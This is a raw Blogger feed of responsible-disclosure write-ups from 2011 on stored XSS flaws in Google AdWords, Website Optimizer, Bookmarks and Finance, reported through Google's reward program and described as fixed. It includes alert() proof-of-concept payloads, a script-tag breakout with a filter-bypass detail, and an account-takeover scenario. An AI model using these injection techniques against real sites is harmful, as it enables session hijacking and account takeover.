Thank you Google security team.</div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com2tag:blogger.com,1999:blog-7534521580510357281.post-18129289690580551242011-03-22T21:35:00.002+02:002011-04-02T19:11:17.951+03:00Google Security Vulnerability Reward Program: Take Control Over Adwords Service!<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span><br />
<div style="direction: ltr; text-align: left;"><a href="http://www.google.com/adwords" target="_blank">Google Adwords</a> Google's Online Advertising service, boost website traffic and sales, was vulnerable to a <b>persistent </b>XSS in the main page Dashboard!<br />
<br />
</div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"><br />
</span></span></div>Well, here I discovered that the Dashboard page stored the Campaigns and the Ad groups as 'widgets' so I went for it and found it was vulnerable. this attack target could be anyone in the adwords service either 'read only','standard' or 'Administrator' access of course, a member who can edit/add Campaigns can take control over the administrator's account and perform actions with administrator permissions as for example attacker could cause the administrator give the attacker admin access with a malicious javascript payload , without the need of any user interaction from the administrator this attack will trigger as soon as the admin or the other victim, enters the adwords service. this way I could perform session hijacking or <b>take control over the account.</b><br />
<br />
Image triggering the xss on the<br />
Vulnerable location #1 (Campaign):<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMp16C71P3zv95JU7QdWE7eC8ApKVgyUmhY_SxNrt9W8VS4_sAHw8M0k6tLhV9sIjhyphenhyphen8ExJGbi0_gMyEBX7wlvBfpKN1LDtHOjNQS4fwlxS3aB6uBdWMM-dKfpVmg5euCesiVsIio5ygY/s1600/google+adwords-new-camp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"target="_blank"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMp16C71P3zv95JU7QdWE7eC8ApKVgyUmhY_SxNrt9W8VS4_sAHw8M0k6tLhV9sIjhyphenhyphen8ExJGbi0_gMyEBX7wlvBfpKN1LDtHOjNQS4fwlxS3aB6uBdWMM-dKfpVmg5euCesiVsIio5ygY/s400/google+adwords-new-camp.jpg" width="400" /></a></div><br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Vulnerable location #2 (Ad Group):</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkDBVknjtAOE5c8eq9Av6IAFp-rczBaj54XXKfxaOfGTI4mToanrWnrRPaWu-dPL_FyJEHKXIcabzb41DmnIBGuOsF2yqDRIMmVUKFg1laCQGJW38a2sCeFP6mxZCXZc10hrta30yDwk/s1600/google+adwords-ad-group.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"target="_blank"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkDBVknjtAOE5c8eq9Av6IAFp-rczBaj54XXKfxaOfGTI4mToanrWnrRPaWu-dPL_FyJEHKXIcabzb41DmnIBGuOsF2yqDRIMmVUKFg1laCQGJW38a2sCeFP6mxZCXZc10hrta30yDwk/s400/google+adwords-ad-group.jpg" width="400" /></a></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">This issue has been fixed by Google security team.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div class="separator" style="clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"></div></div><div dir="ltr" trbidi="on">I appreciate the opportunity to preserve my skills and gain some more experience<br />
Thank you Google security team.</div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-74149363034716387822011-02-27T17:03:00.008+02:002011-03-03T10:28:56.426+02:00Google Security Vulnerability Reward Program: Google Website Optimizer - Stored XSS<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span><br />
<div style="direction: ltr; text-align: left;"><a href="http://www.google.com/websiteoptimizer" target="_blank">Google WebsiteOptimizer</a> Google's free website testing and optimization tool, missed a very important check when people create their experiments. additionally they made it more easier to exploit.<br />
<br />
</div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"><br />
</span></span></div>The first step was creating a new experiment I preferred A/B Experiment, then I had an option to add URLs to verify my website is real, as first I inserted some string "BenHayak" for example and pressed continue.<br />
After that screen I had an option to throw the dirty job over to my "Webmaster" - "Your Webmaster will install and do the dirty work for you ;)". Great they give me a link to Google domain validation page with links to <a href="http://www.blogger.com/post-edit.g?blogID=7534521580510357281&postID=7414936303471638782#">BenHayak</a> when I clicked it I noticed it opens a page with only "BenHayak" in the address bar.<br />
Then I made another Experiment filled with many javascript:alert('BenHayak'); and sent this stored xss report alog with recommendation to always check for "http://" in the input.<br />
<br />
POC link: <a href="https://www.google.com/analytics/siteopt/ab_install_instructions?experiment=EAAAABakGLUhKf2ff8bP4hP8DPs&account=20970990&user=AN_xLxejwJA6E2ghVnirghhyZv1AG-g3Eg&hl=iw&portal=0&t=HePW_hzZ6hA" target="_blank">Click to trigger the Alert stored xss</a><br />
<br />
Image triggering the xss:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNqcJHpQjN9r2CbTQyvVeRd0npjyc5TNqJDP68gORe2nqbD3NMTrhyphenhyphenhSEcwsp1tWTB_plRsTzmYYvxK3KDF2Svr-PLoqL16k93jB6RBSit8p_1R5UqpqkDvY-J5EePw_FxIeelKlrzfg0/s1600/website+optimizer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNqcJHpQjN9r2CbTQyvVeRd0npjyc5TNqJDP68gORe2nqbD3NMTrhyphenhyphenhSEcwsp1tWTB_plRsTzmYYvxK3KDF2Svr-PLoqL16k93jB6RBSit8p_1R5UqpqkDvY-J5EePw_FxIeelKlrzfg0/s320/website+optimizer.jpg" width="320" /></a></div><br />
<br />
</div><div dir="ltr" trbidi="on">I appreciate the opportunity to preserve my skills and gain some more experience<br />
Thank you Google security team.</div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com1tag:blogger.com,1999:blog-7534521580510357281.post-55282202135151057822011-02-27T16:22:00.000+02:002011-02-27T16:22:45.513+02:00UpdatesWell, It's been couple of weeks since I wanted to update the blog with<br />
new vulnerabilities I found in Google products.<br />
But, as for now these bugs aren't fixed yet,<br />
I will publish it soon, after Google will fix the issues.<br />
<br />
Best regards,<br />
Ben Hayak[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com1tag:blogger.com,1999:blog-7534521580510357281.post-71685155946358509402011-02-17T00:35:00.049+02:002011-04-19T11:28:02.551+03:00Google Security Vulnerability Reward Program: Google Bookmarks Stored XSS<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span><br />
<div style="direction: ltr; text-align: left;"><a href="https://www.google.com/bookmarks/l" target="_blank">Google Bookmarks</a> <span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">lets you create an online bookmark lists.</span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 14px;"> I found this one in the "New Section" function. In order for this XSS to trigger though, the victim had to edit your section.</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 14px;"><br />
</span></div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"><br />
</span></span></div>The first step was creating a new bookmark list. After I got that done, I created a New section with Image tag poisioned with XSS payload. The final step was inviting the victim by giving him/her access to my bookmarks list.<br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
</div><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMWRGKn1x21tyYgXxPOEbDCeq0zb-GgTq2OaJ5kdHtQAnnNxQh6S0XZLYzQeJrQ7eAjKYrBY_iEqra_sM-7SLyTf0cz40AWXvPnB2_c1ujSceIFObDtnd9zdr8_6T8iPKdiaP0HTzpP4M/s1600/bookmarks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMWRGKn1x21tyYgXxPOEbDCeq0zb-GgTq2OaJ5kdHtQAnnNxQh6S0XZLYzQeJrQ7eAjKYrBY_iEqra_sM-7SLyTf0cz40AWXvPnB2_c1ujSceIFObDtnd9zdr8_6T8iPKdiaP0HTzpP4M/s400/bookmarks.jpg" width="400" /></a></div><br />
<div dir="ltr" trbidi="on"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">This issue has been fixed by Google security team.</div></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div></div><div class="separator" style="clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"></div></div><div dir="ltr" trbidi="on"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">I appreciate the opportunity to preserve my skills and gain some more experience</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Thank you Google security team.</div></div></div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-31321203946434358492011-02-16T16:40:00.013+02:002011-04-02T19:10:51.928+03:00Google Security Vulnerability Reward Program: Google Finance Stored XSS<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span></div><div style="direction: ltr; text-align: left;"><a href="http://www.google.com/finance" target="_blank">Google Finance</a> <span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">lets you create </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 14px;">Portfolios. After a few tries I figured a method to </span></div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 14px;">Trigger XSS using portfolio name.</span></span></div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 14px;"><br />
</span></span></div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"><br />
</span></span></div>OK, at First I used different payloads in the Portfolio name but nothing triggered, <br />
but after some more research I found that after I create my Portfolio payload and click on one of these Deposit / Withdraw my Portfolio name is inserted into this function</div><div dir="ltr" trbidi="on"><pre class="Cpp" name="code">function initPage() {
initVars();
dview = google.finance.portfolio.init({
id: '8',
expected_hash: 'U66jb3VTR2ZPUjgtaXJqaXRZc2s33VNmVWdjfDEyOTc4NzE22NDk',
edition: 'us',
name: '--XSS PAYLOAD--',
currency: 'USD'
}, true,
'/finance/s/7skxqAM7Z8M/chart9.swf?hl=en&gl=us',
true
,
false,
''
);
</pre><span class="Apple-style-span" style="color: #d5a6bd;">name: '<b>--XSS PAYLOAD--</b>'</span> , so I inserted this payload as portfolio name: </script><body onload=alert(1)> there was a filter that when you insert this </script> the server removed everything before the </script><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrTzBEjydurKb-H6lkTK5Gc_ws28NroyQa_u3Q2yyCnCHY5lTWVZ04Enai9ZKbOUNoSVbhFKwCeAUr5O_u3eubNEpy2UTZr5qXjH_yOEwnyoWrlPX3M5hvRtaonoRonGA3vWZc1KhQWT8/s1600/google-finance-for-blog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"target="_blank"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrTzBEjydurKb-H6lkTK5Gc_ws28NroyQa_u3Q2yyCnCHY5lTWVZ04Enai9ZKbOUNoSVbhFKwCeAUr5O_u3eubNEpy2UTZr5qXjH_yOEwnyoWrlPX3M5hvRtaonoRonGA3vWZc1KhQWT8/s400/google-finance-for-blog.jpg" width="400" /></a></div><br />
I appreciate the opportunity to preserve my skills and gain some more experience<br />
Thank you Google security team.</div></div></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com4